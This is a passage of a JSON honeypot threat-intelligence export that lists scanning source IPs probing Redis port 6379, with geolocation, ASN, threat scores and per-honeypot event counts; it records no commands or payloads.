      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Chicago",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 164,
        "days_active_30d": 30,
        "ports_targeted_30d": 153,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:04:10.857000+00:00",
        "last_seen_30d": "2026-03-31T21:05:48.736000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 164
      }
    },
    "200.188.48.146": {
      "attack_count": 6,
      "first_seen": "2026-03-29T16:47:13.000Z",
      "last_seen": "2026-03-29T16:48:14.336Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Mexico",
      "country_code": "MX",
      "city": "General Escobedo",
      "asn": 11172,
      "as_org": "Alestra, S. de R.L. de C.V.",
      "threat_score": 7.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-29T16:48:14.336000+00:00",
        "last_seen_30d": "2026-03-29T16:48:14.336000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "100.29.192.45": {
      "attack_count": 5,
      "first_seen": "2026-03-27T10:01:11.000Z",
      "last_seen": "2026-03-27T10:02:46.656Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 25.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 4.8,
        "persistence": 13.3,
        "diversity": 6,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 16,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T07:56:41.983000+00:00",
        "last_seen_30d": "2026-03-27T10:02:46.656000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "102.37.102.212": {
      "attack_count": 5,
      "first_seen": "2026-03-15T13:22:14.000Z",
      "last_seen": "2026-03-15T13:23:19.021Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Africa",
      "country_code": "ZA",
      "city": "Johannesburg",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 3.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-15T13:23:19.021000+00:00",
        "last_seen_30d": "2026-03-15T13:23:19.021000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "111.231.1.253": {
      "attack_count": 5,
      "first_seen": "2026-03-26T20:58:46.000Z",
      "last_seen": "2026-03-26T20:59:47.317Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 6.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-26T20:59:47.317000+00:00",
        "last_seen_30d": "2026-03-26T20:59:47.317000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "117.50.47.100": {
      "attack_count": 5,
      "first_seen": "2026-03-21T06:38:57.000Z",
      "last_seen": "2026-03-21T06:40:06.647Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4808,
      "as_org": "China Unicom Beijing Province Network",
      "threat_score": 5.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-21T06:40:06.647000+00:00",
        "last_seen_30d": "2026-03-21T06:40:06.647000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "119.29.60.36": {
      "attack_count": 5,
      "first_seen": "2026-03-24T19:08:59.000Z",
      "last_seen": "2026-03-24T19:10:08.424Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 6.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T19:10:08.424000+00:00",
        "last_seen_30d": "2026-03-24T19:10:08.424000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "134.209.64.9": {
      "attack_count": 5,
      "first_seen": "2026-03-19T03:05:29.000Z",
      "last_seen": "2026-03-19T03:07:10.772Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 24.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.4,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 2,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-18T15:16:04.736000+00:00",
        "last_seen_30d": "2026-03-19T04:36:08.689000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "139.144.239.78": {
      "attack_count": 5,
      "first_seen": "2026-03-04T12:37:28.000Z",
      "last_seen": "2026-03-04T12:38:35.754Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cedar Knolls",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 188,
        "days_active_30d": 30,
        "ports_targeted_30d": 165,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:46:49.852000+00:00",
        "last_seen_30d": "2026-03-31T20:07:46.689000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 188
      }
    },
    "143.42.1.189": {
      "attack_count": 5,
      "first_seen": "2026-03-17T12:37:16.000Z",
      "last_seen": "2026-03-17T12:38:19.334Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cedar Knolls",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 172,
        "days_active_30d": 30,
        "ports_targeted_30d": 160,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:46:23.021000+00:00",
        "last_seen_30d": "2026-03-31T14:55:29.331000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 172
      }
    },
    "155.212.189.201": {
      "attack_count": 5,
      "first_seen": "2026-03-27T23:07:34.000Z",
      "last_seen": "2026-03-27T23:08:45.129Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": "Moscow",
      "asn": 198610,
      "as_org": "Beget LLC",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T23:08:45.129000+00:00",
        "last_seen_30d": "2026-03-27T23:08:45.129000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "157.230.61.69": {
      "attack_count": 5,
      "first_seen": "2026-03-11T07:46:43.000Z",
      "last_seen": "2026-03-11T07:48:17.563Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 9.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 1.7,
        "diversity": 14,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 2,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T12:59:11.356000+00:00",
        "last_seen_30d": "2026-03-11T08:37:09.834000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "173.255.210.89": {
      "attack_count": 5,
      "first_seen": "2026-03-09T12:38:56.000Z",
      "last_seen": "2026-03-09T12:40:06.323Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 172,
        "days_active_30d": 30,
        "ports_targeted_30d": 161,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T07:05:58.254000+00:00",
        "last_seen_30d": "2026-03-31T18:01:17.327000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 172
      }
    },
    "176.65.139.90": {
      "attack_count": 5,
      "first_seen": "2026-03-27T20:35:58.000Z",
      "last_seen": "2026-03-27T20:37:08.335Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Luxembourg",
      "country_code": "LU",
      "city": null,
      "asn": 214472,
      "as_org": "Offshore LC",
      "threat_score": 34.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.4,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 1,
        "ports_targeted_30d": 21,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T20:36:59.380000+00:00",
        "last_seen_30d": "2026-03-27T20:37:08.363000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "221.207.34.202": {
      "attack_count": 5,
      "first_seen": "2026-03-31T06:11:16.000Z",
      "last_seen": "2026-03-31T06:12:26.927Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 25.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 6.0,
        "persistence": 5.0,
        "diversity": 4,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 6,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-26T09:47:32+00:00",
        "last_seen_30d": "2026-03-31T06:12:26.927000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3,
        "Honeytrap": 1
      }
    },
    "24.144.119.78": {
      "attack_count": 5,
      "first_seen": "2026-03-02T19:22:28.000Z",
      "last_seen": "2026-03-02T19:24:02.765Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 4.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.4,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 2,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T12:20:33.406000+00:00",
        "last_seen_30d": "2026-03-03T07:01:25.946000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "36.137.158.226": {
      "attack_count": 5,
      "first_seen": "2026-03-28T21:23:14.000Z",
      "last_seen": "2026-03-28T21:24:17.468Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 7.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-28T21:24:17.468000+00:00",
        "last_seen_30d": "2026-03-28T21:24:17.468000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "64.62.197.111": {
      "attack_count": 5,
      "first_seen": "2026-03-05T12:23:47.000Z",
      "last_seen": "2026-03-05T12:24:55.264Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 75.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.2,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 33,
        "days_active_30d": 28,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-03T08:55:07+00:00",
        "last_seen_30d": "2026-03-30T09:08:45.364000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 25,
        "Cowrie": 4,
        "Honeytrap": 3,
        "Tanner": 1
      }
    },
    "64.62.197.151": {
      "attack_count": 5,
      "first_seen": "2026-03-06T12:53:09.000Z",
      "last_seen": "2026-03-06T12:54:13.824Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 52.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.3,
        "persistence": 19.2,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 27,
        "days_active_30d": 23,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T03:21:11+00:00",
        "last_seen_30d": "2026-03-26T14:24:37.868000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 21,
        "Honeytrap": 6
      }
    },
    "66.132.186.211": {
      "attack_count": 5,
      "first_seen": "2026-03-26T22:36:51.000Z",
      "last_seen": "2026-03-26T22:37:58.032Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 47.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.0,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 25,
        "days_active_30d": 10,
        "ports_targeted_30d": 24,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-22T05:45:37.581000+00:00",
        "last_seen_30d": "2026-03-31T23:23:06.102000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 25
      }
    },
    "68.183.99.196": {
      "attack_count": 5,
      "first_seen": "2026-03-08T18:11:21.000Z",
      "last_seen": "2026-03-08T18:12:25.321Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 1.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T18:12:25.321000+00:00",
        "last_seen_30d": "2026-03-08T18:12:25.321000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "89.167.28.24": {
      "attack_count": 5,
      "first_seen": "2026-03-27T07:58:14.000Z",
      "last_seen": "2026-03-27T07:59:24.939Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Finland",
      "country_code": "FI",
      "city": "Helsinki",
      "asn": 24940,
      "as_org": "Hetzner Online GmbH",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T07:59:24.939000+00:00",
        "last_seen_30d": "2026-03-27T07:59:24.939000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "185.226.196.14": {
      "attack_count": 4,
      "first_seen": "2026-03-20T01:28:12.000Z",
      "last_seen": "2026-03-20T01:29:21.396Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 21859,
      "as_org": "Zenlayer Inc",
      "threat_score": 56.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.9,
        "persistence": 20.0,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 62,
        "days_active_30d": 24,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T19:47:08.948000+00:00",
        "last_seen_30d": "2026-03-26T11:20:27.301000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 37,
        "Honeytrap": 25
      }
    },
    "64.62.156.83": {
      "attack_count": 4,
      "first_seen": "2026-03-30T13:27:18.000Z",
      "last_seen": "2026-03-30T13:28:22.088Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 77.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.6,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 29,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-03T08:09:08.868000+00:00",
        "last_seen_30d": "2026-03-31T14:26:58.306000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 18,
        "Honeytrap": 3,
        "CitrixHoneypot": 1,
        "Miniprint": 1
      }
    },
    "64.62.197.156": {
      "attack_count": 4,
      "first_seen": "2026-03-16T14:32:19.000Z",
      "last_seen": "2026-03-16T14:33:24.890Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 53.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.6,
        "persistence": 20.0,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 24,
        "ports_targeted_30d": 18,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T03:31:26.104000+00:00",
        "last_seen_30d": "2026-03-26T15:10:33.049000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20,
        "Honeytrap": 3
      }
    },
    "64.62.197.230": {
      "attack_count": 4,
      "first_seen": "2026-03-17T12:32:45.000Z",
      "last_seen": "2026-03-17T12:33:51.578Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 51.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 21,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-03T03:47:08.870000+00:00",
        "last_seen_30d": "2026-03-23T13:31:35.959000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 17,
        "ConPot": 1,
        "H0neytr4p": 1,
        "Tanner": 1
      }
    },
    "65.49.20.118": {
      "attack_count": 4,
      "first_seen": "2026-03-15T12:20:42.000Z",
      "last_seen": "2026-03-15T12:21:47.383Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 40.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 10.8,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 20,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T04:09:21+00:00",
        "last_seen_30d": "2026-03-22T01:58:15.714000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11,
        "Honeytrap": 1
      }
    },
    "16.58.56.214": {
      "attack_count": 474,
      "first_seen": "2026-03-07T04:51:36.000Z",
      "last_seen": "2026-03-29T03:51:56.199Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 14295,
        "days_active_30d": 30,
        "ports_targeted_30d": 177,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T03:15:42+00:00",
        "last_seen_30d": "2026-03-31T23:31:04.862000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9234,
        "Honeytrap": 4203,
        "Dionaea": 234,
        "Mailoney": 162,
        "ConPot": 152,
        "Cowrie": 134,
        "Redishoneypot": 128,
        "Tanner": 12,
        "ElasticPot": 9,
        "Ipphoney": 9,
        "Ciscoasa": 6,
        "Honeyaml": 6,
        "H0neytr4p": 5,
        "CitrixHoneypot": 1
      }
    },
    "18.116.101.220": {
      "attack_count": 412,
      "first_seen": "2026-03-05T06:29:19.000Z",
      "last_seen": "2026-03-21T04:57:18.057Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 14285,
        "days_active_30d": 30,
        "ports_targeted_30d": 175,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T02:54:45.795000+00:00",
        "last_seen_30d": "2026-03-31T23:00:48.138000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9286,
        "Honeytrap": 4330,
        "Dionaea": 178,
        "Cowrie": 153,
        "Mailoney": 121,
        "Redishoneypot": 102,
        "ConPot": 71,
        "ElasticPot": 11,
        "Ipphoney": 11,
        "Ciscoasa": 8,
        "Honeyaml": 7,
        "H0neytr4p": 3,
        "CitrixHoneypot": 2,
        "Tanner": 2
      }
    },
    "97.74.92.144": {
      "attack_count": 129,
      "first_seen": "2026-03-03T07:15:45.000Z",
      "last_seen": "2026-03-30T04:22:50.686Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 26496,
      "as_org": "GoDaddy.com, LLC",
      "threat_score": 51.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.5,
        "persistence": 23.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 56,
        "days_active_30d": 28,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T07:15:45+00:00",
        "last_seen_30d": "2026-03-30T04:22:50.686000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 42,
        "Suricata": 14
      }
    },
    "3.149.230.178": {
      "attack_count": 101,
      "first_seen": "2026-03-24T03:30:24.000Z",
      "last_seen": "2026-03-24T03:41:16.199Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 55.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 26.6,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 462,
        "days_active_30d": 1,
        "ports_targeted_30d": 30,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-24T02:03:44+00:00",
        "last_seen_30d": "2026-03-24T11:45:27.408000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 306,
        "Honeytrap": 127,
        "Redishoneypot": 27,
        "CitrixHoneypot": 1,
        "ConPot": 1
